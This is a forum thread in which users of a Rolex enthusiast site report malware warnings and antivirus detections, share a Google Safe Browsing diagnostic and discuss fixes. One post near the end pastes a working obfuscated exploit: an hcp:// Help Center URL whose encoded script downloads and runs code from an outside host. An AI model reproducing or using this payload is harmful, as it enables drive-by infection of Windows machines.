My Mac, Safari and TRF

[eric23]

I have not got any warnings all day, I have a Win XP PC with IE8 at work.

[MoBe]

My Kaspersky went nuts this morning but has calmed down now.

[Fiery]

I had to add two entries to my HOSTS file to get rid of this malware. I can't believe admins cannot fix this up :(

[Martylaa]

Mines doing it on a macbook and iphone????

[esm]

Quote:

Originally Posted by Fiery

I had to add two entries to my HOSTS file to get rid of this malware. I can't believe admins cannot fix this up :(

Did you not read that Steve is currently working on it? Everything takes time.

I have no issues all day, whether on my iPhone, iPad or two of the MBPs.

Like Larry suggested, delete cookies.

[JustABreathAway]

Avast is also what detected the Malware for my home PC before my web browsers started telling me not to come here.

iPhone now...

[Fiery]

Quote:

Originally Posted by esm

Did you not read that Steve is currently working on it? Everything takes time.

I have no issues all day, whether on my iPhone, iPad or two of the MBPs.

Like Larry suggested, delete cookies.

I'm sorry about that, but it's been bugging me since this morning, and now it was a different malware than in the morning.

It doesn't come up on your mobile devices because it uses a Java .JAR file that needs Java Runtime installed. Sometimes not having a feature means you don't have to worry about a malware

[JustABreathAway]

I myself am hesitant and lean towards trusting the anti-malware programs in Google and Avast.

I hadan expensive PC eaten within the last year before Avast and it was quite an unpleasant experience.

[dalip]

Quote:

Originally Posted by Fiery

I had to add two entries to my HOSTS file to get rid of this malware. I can't believe admins cannot fix this up :(

Statements like your last one are not helpful at all. It is being worked on.

[Rags]

It seems to have stopped on my PC. My AVG blocked it three times now I'm not getting the message anymore.

[Fiery]

Quote:

Originally Posted by dalip

Statements like your last one are not helpful at all. It is being worked on.

I'm sorry about that. Okay, please understand now that I'm trying to help with this feedback. I've done the following just now:

1) Removed all temporary internet files, and all cookies (WinXP SP3, IE8)

2) Removed the two entries from my HOSTS file about this matter, which were:

127.0.0.1 nempesrsrioic.com
127.0.0.1 teorccbyaio.com

3) Logged in again in TRF main page (www.rolexforums.com)

4) Malware still comes up (the teorccbyaio one)

If I should just shut up and let you work on this, please let me know

[2careless]

hmm i've been using my work laptop, my home PC, my son's ipad, and my android phone to access TRF today and yesterday. Absolutely no warning whatsoever.
Work is using Trendmicro, I'm using Avast + Spybot S&D, so the anti malware suites are as diverse as possible.
What is the problem exactly???

[LordNinja]

I just had a PC claim:TR/Atraps.gen trojan was pulled down from loggin in.

Latest updates running antivir. Pc has never been to TRF except today to test this. I use a Mac.

Just to update. Has anyone scanned the site directories or talked to google about the flag

The above indication to me is also that in the same house computers may have different patches and security in place. I've seen an increase of these lately. I own a computer repair/networking company.

Hopefully it gets sorted.

I'll surf from mobile for now.

[77T]

Quote:

Originally Posted by dalip

Larry has already posted this on another thread concerning this. Here it is again:

"Try clearing your cache and temporary files; then go to the TRF main log-in page..

Thanks for the cross-post. Where did Larry post this? It does not remove the very real threat to users.

I love this forum and sorry it has been ensnared in the wave of attacks. But until TRF scans clean for multiple redirects, users will continue to get warnings.

[ffighter556]

It's a PC deal my Mac no problem my PC new out of box today Trojan blocked on site and every page that I loaded.

[LordNinja]

It's both.

[LordNinja]

Do you have OSX lion + patched?

[ffighter556]

Macbook pro is about a week old with Lion up to date no warnings of any kind..

[LordNinja]

I have 2 of those, older but up to date and warnings popping on chrome And safari.

[LordNinja]

Mixed bag I guess..

[ffighter556]

Actually whats funny is if I go to the forum from my bookmark its fine. If I go through Google not????? on my Mac..

[springer]

I'm getting the same messages also with Firefox.

[Beelzy]

I've been getting the "Warning Attack Page" all day. I finally did an end run using
Google to get back in.

Quite odd, for when I ran a scan on the laptop nothing came up infected.

[madkimchee]

I'm on Chrome and I got the warning.

[Grissom]

Quote:

Originally Posted by ffighter556

Macbook pro is about a week old with Lion up to date no warnings of any kind..

Make sure your safari security settings are correct and up to date. If you see something like this (the yellow warning triangle with the ! In it) then your google safe browsing is out of date and may not give you any warning messages.

[Mickey®]

Anyone else getting this message? I get it when I click on a link to the site or even on my bookmark/favorites?

BIG RED SCREEN on Google Chrome that says:



Warning: Something's Not Right Here!
www.rolexforums.com contains malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified www.rolexforums.com that we found malware on the site. For more about the problems found on www.rolexforums.com, visit the Google Safe Browsing diagnostic page.

If you understand that visiting this site may harm your computer, proceed anyway.

Help improve detection of malware by sending additional data to Google about sites on which you see this warning. This data will be handled in accordance with the Safe Browsing privacy policies.



What's changed on the site? Or is Google Chrome lost it's mind?

[Mickey®]

Here is what it says when I click on the Diagnostics page...
Safe Browsing
Diagnostic page for rolexforums.com

What is the current listing status for rolexforums.com?
Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 4 time(s) over the past 90 days.

What happened when Google visited this site?
Of the 33 pages we tested on the site over the past 90 days, 23 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-12-09, and the last time suspicious content was found on this site was on 2011-12-09.
Malicious software includes 37 exploit(s), 21 trojan(s), 13 scripting exploit(s). Successful infection resulted in an average of 4 new process(es) on the target machine.

Malicious software is hosted on 3 domain(s), including ccsnaioebom.com/, nempesrsrioic.com/, ysybciderbmcp.com/.

This site was hosted on 1 network(s) including AS30083 (SERVER4YOU).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, rolexforums.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
Updated 9 hours ago
©2008 Google - Google Home

[gregmoeck]

sql database injection or some infection, passwords may be compromised, here is what i get now.



hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A. .%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,4 7,99,32,101,99,104,111,32,66,61,34,108,46,118,98,1 15,34,58,87,105,116,104,32,67,114,101,97,116,101,7 9,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88, 77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,3 4,71,69,84,34,44,34,104,116,116,112,58,47,47,111,1 14,101,105,110,111,101,107,115,111,110,121,46,99,1 11,109,47,99,111,110,116,101,110,116,47,104,99,112 ,95,118,98,115,46,112,104,112,63,102,61,50,54,38,1 00,61,49,34,44,102,97,108,115,101,58,46,115,101,11 0,100,40,41,58,83,101,116,32,65,32,61,32,67,114,10 1,97,116,101,79,98,106,101,99,116,40,34,83,99,114, 105,112,116,105,110,103,46,70,105,108,101,83,121,1 15,116,101,109,79,98,106,101,99,116,34,41,58,83,10 1,116,32,68,61,65,46,67,114,101,97,116,101,84,101, 120,116,70,105,108,101,40,65,46,71,101,116,83,112, 101,99,105,97,108,70,111,108,100,101,114,40,50,41, 32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,1 05,116,101,76,105,110,101,32,46,114,101,115,112,11 1,110,115,101,84,101,120,116,58,69,110,100,32,87,1 05,116,104,58,68,46,67,108,111,115,101,58,67,114,1 01,97,116,101,79,98,106,101,99,116,40,34,87,83,99, 114,105,112,116,46,83,104,101,108,108,34,41,46,82, 117,110,32,65,46,71,101,116,83,112,101,99,105,97,1 08,70,111,108,100,101,114,40,50,41,32,43,32,34,92, 34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,10 8,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,9 2,108,46,118,98,115,32,38,38,32,116,97,115,107,107 ,105,108,108,32,47,70,32,47,73,77,32,104,101,108,1 12,99,116,114,46,101,120,101)));</script>

[sleddog]

Quote:

Originally Posted by Fiery

I had to add two entries to my HOSTS file to get rid of this malware. I can't believe admins cannot fix this up :(

I've now moved this thread over to a more current and original thread that was started before this one....
Admin IS working on the issue, and has been for some time.!

This is not some kind of "Quick fix", just for you!

It appears only 15% (approx.) of users are currently effected, so to keep the forum up, and to work on the issue, a difficult task is in process.
If you'd like a faster service, please search the word "patience" in your dictionary!! It may help relieve the hardships you've endured during this process!?!?!?

[gregmoeck]

damn microsoft, i use linux downstairs and never have a problem. i come upstairs and use my windows netbook and now its infected. microsoft security essentials just cleaned exploit:JS/Blacloe.AC which I got from this forum. You should shut down the forum until issue is fixed to prevent others from getting thier home pc's compromised. Leaving this up all day probably infected a ton of workstations across the globe.